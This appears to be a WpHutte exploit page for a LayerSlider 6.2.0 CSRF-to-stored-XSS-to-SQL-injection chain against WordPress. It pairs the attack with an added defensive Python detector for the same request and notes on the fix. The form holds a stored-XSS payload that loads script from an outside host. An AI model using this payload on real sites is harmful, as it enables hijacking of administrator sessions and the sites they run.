LayerSlider 6.2.0 CSRF -> Stored XSS -> SQL Injection

by WpHutte.com

Notes:

You need to be logged in with Admin privileges on the target URL, and
have at least 1 slider for this to work.

Also, you might want to allow popups.

Tested on WordPress 4.7.3

Settings:

Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed


Output log

None

? means not found in the charset, _ means AJAX error.

The Form

action : ls_save_screen_options
options[numberOfSliders] : 11"> <script src=http://cdn.wphutte.com/Utils/alert.js></script>
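
The request in the form above, seen from the defender's side: an added example (not code from WpHutte or from LayerSlider) that flags admin-ajax.php POSTs carrying the ls_save_screen_options action when they arrive from another origin or carry a non-numeric options[numberOfSliders]. The host name, the function names, the four-digit limit and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "blog.example.test"      # assumption: host name of the protected site
ACTION = "ls_save_screen_options"    # AJAX action named in the form on this page
FIELD = "options[numberOfSliders]"   # parameter named in the form on this page


def inspect_request(method, path, headers, body):
    """Return findings for one admin-ajax.php request; an empty list means clean."""
    findings = []
    if method != "POST" or not urlsplit(path).path.endswith("/wp-admin/admin-ajax.php"):
        return findings
    params = parse_qs(body, keep_blank_values=True)
    if ACTION not in params.get("action", []):
        return findings
    # CSRF indicator: the POST was not triggered from a page on the site itself.
    source = headers.get("Origin") or headers.get("Referer") or ""
    if urlsplit(source).hostname != SITE_HOST:
        findings.append("missing or cross-origin source: %r" % source)
    # The field is a count, so anything but a short run of ASCII digits is suspect
    # (the four-digit ceiling is an assumption of this example).
    for value in params.get(FIELD, []):
        if not (value.isascii() and value.isdigit() and len(value) <= 4):
            findings.append("non-numeric %s: %r" % (FIELD, value))
    return findings


# Constructed sample requests (not captured traffic).
SAMPLES = [
    ("POST", "/wp-admin/admin-ajax.php",
     {"Origin": "https://blog.example.test"},
     "action=ls_save_screen_options&options%5BnumberOfSliders%5D=25"),
    ("POST", "/wp-admin/admin-ajax.php",
     {"Referer": "https://other.example.net/page.html"},
     "action=ls_save_screen_options&options%5BnumberOfSliders%5D="
     "11%22%3E+%3Cscript+src%3D%2F%2Fx.example.net%2Fa.js%3E%3C%2Fscript%3E"),
]


def scan(samples=SAMPLES):
    """Run inspect_request over every sample and return the findings per request."""
    return [inspect_request(*sample) for sample in samples]


if __name__ == "__main__":
    for request, result in zip(SAMPLES, scan()):
        print(request[3][:60], "->", result or "clean")
```

The same two conditions are what a server-side fix has to enforce: reject the request unless it carries a valid anti-CSRF token, and store the value only after casting it to an integer.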

Iframe for POST result

